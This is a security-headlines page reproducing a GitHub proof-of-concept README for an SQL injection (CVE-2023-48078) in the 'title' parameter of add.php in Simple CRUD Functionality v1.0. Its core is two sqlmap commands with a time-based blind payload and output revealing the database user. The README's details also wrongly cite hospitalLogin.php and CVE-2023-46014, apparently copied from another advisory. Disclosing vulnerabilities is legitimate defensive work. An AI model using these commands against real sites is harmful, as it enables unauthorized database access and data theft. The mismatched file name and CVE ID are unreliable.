Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48078: GitHub - esasadam06/Simple-CRUD-Functionality-SQLi-POC

SQL Injection vulnerability in add.php in Simple CRUD Functionality v1.0 allows attackers to run arbitrary SQL commands via the ‘title’ parameter.

CVE
#sql#vulnerability#web#git#php#auth

Skip to content

Sign up

    • Actions

      Automate any workflow

    • Packages

      Host and manage packages

    • Security

      Find and fix vulnerabilities

    • Codespaces

      Instant dev environments

    • Copilot

      Write better code with AI

    • Code review

      Manage code changes

    • Issues

      Plan and track work

    • Discussions

      Collaborate outside of code

Explore

*   All features
*   Documentation
*   GitHub Skills
*   Blog
  • For

    • Enterprise
    • Teams
    • Startups
    • Education

    By Solution

    • CI/CD & Automation
    • DevOps
    • DevSecOps

    Resources

    • Learning Pathways
    • White papers, Ebooks, Webinars
    • Customer Stories
    • Partners
    • GitHub Sponsors

      Fund open source developers

*   The ReadME Project
    
    GitHub community articles
    

Repositories

*   Topics
*   Trending
*   Collections
  • Pricing

Search code, repositories, users, issues, pull requests…

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Saved searches****Use saved searches to filter your results more quickly

Sign in

Sign up

esasadam06 / Simple-CRUD-Functionality-SQLi-POC Public

  • Notifications
  • Fork 0
  • Star 0

0 stars 0 forks Activity

Star

Notifications

  • Code
  • Issues
  • Pull requests
  • Actions
  • Projects
  • Security
  • Insights

Additional navigation options

main

Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Clone

    Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

Git stats

  • 5 commits

FilesPermalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Simple-CRUD-Functionality-SQLi-POC - CVE-2023-48078 Vendor Homepage Software Link Overview Vulnerability Details References: Description Proof of Concept (PoC) :

README.md

Simple-CRUD-Functionality-SQLi-POC - CVE-2023-48078

  • Exploit Author: esasadam06

Vendor Homepage

  • https://code-projects.org/simple-crud-functionality-in-php-with-source-code

Software Link

  • https://download.code-projects.org/details/8e863682-a839-4645-94e0-ae769c83635d

Overview

  • Simple CRUD Functionality SQLi POC is susceptible to a significant security vulnerability that arises from insufficient protection on the ‘title’ parameters in the hospitalLogin.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

Vulnerability Details

  • CVE ID: CVE-2023-46014
  • Affected Version: Simple CRUD Functionality V1.0
  • Vulnerable File: /add.php
  • Parameter Names: title
  • Attack Type: Local

References:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48078
  • https://nvd.nist.gov/vuln/detail/CVE-2023-48078

Description

  • The lack of proper input validation and sanitization on the ‘title’ parameters allows an attacker to craft SQL injection queries, gaining unauthorized access to the database.

Proof of Concept (PoC) :

  • sqlmap -u ‘http://localhost/CRUD-Operation/add.php’ -p ‘title’ --data="title=test&descr=test&sub=" --risk=3 --level=3 --method=’POST’ -D ‘crud’


    Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: title=test’ RLIKE SLEEP(5) AND 'FxIv’=’FxIv&descr=test&sub=


  • sqlmap -u ‘http://localhost/CRUD-Operation/add.php’ -p ‘title’ --data="title=test&descr=test&sub=" --risk=3 --level=3 --method=’POST’ -D ‘crud’ -T ‘notes’ --is-dba --current-user

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: title=test’ RLIKE SLEEP(5) AND 'FxIv’=’FxIv&descr=test&sub=


    root@localhost current user: ‘root@localhost’

About

No description, website, or topics provided.

Resources

Readme

Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks

Report repository

Releases

No releases published

Packages

No packages published

Related news

Blood Bank 1.0 SQL Injection

Blood Bank version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Nitin Sharma in October of 2021.

CVE-2023-46014: GitHub - ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907